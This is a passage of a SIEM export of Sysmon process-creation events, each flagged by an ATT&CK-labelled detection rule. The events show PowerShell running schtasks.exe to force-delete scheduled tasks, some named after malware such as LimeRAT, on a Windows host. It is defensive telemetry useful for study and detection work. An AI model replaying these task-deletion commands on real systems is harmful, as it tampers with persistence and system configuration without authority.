C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 
-NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.899"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001059f12100}"",""processId"":""3844"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.246",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.868 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001090ef2100} +ProcessId: 7636 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.870638500Z"",""eventRecordID"":""2837"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.868\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001090ef2100}\r\nProcessId: 7636\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.868"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001090ef2100}"",""processId"":""7636"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.213",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.829 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010aeed2100} +ProcessId: 5964 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.836676300Z"",""eventRecordID"":""2836"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.829\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010aeed2100}\r\nProcessId: 5964\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.829"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010aeed2100}"",""processId"":""5964"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" 
-Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.200",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.790 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010d2eb2100} +ProcessId: 6784 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.792724600Z"",""eventRecordID"":""2835"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.790\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010d2eb2100}\r\nProcessId: 6784\r\nImage: 
C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.790"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010d2eb2100}"",""processId"":""6784"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.190",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.750 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001010ea2100} +ProcessId: 3496 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.753537100Z"",""eventRecordID"":""2834"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.750\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001010ea2100}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.750"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001010ea2100}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.165",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.710 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001067e82100} +ProcessId: 8004 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.720798700Z"",""eventRecordID"":""2833"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.710\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001067e82100}\r\nProcessId: 8004\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:32.710"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001067e82100}"",""processId"":""8004"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.150",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.667 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001075e62100} +ProcessId: 3524 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.674937500Z"",""eventRecordID"":""2832"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.667\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001075e62100}\r\nProcessId: 3524\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
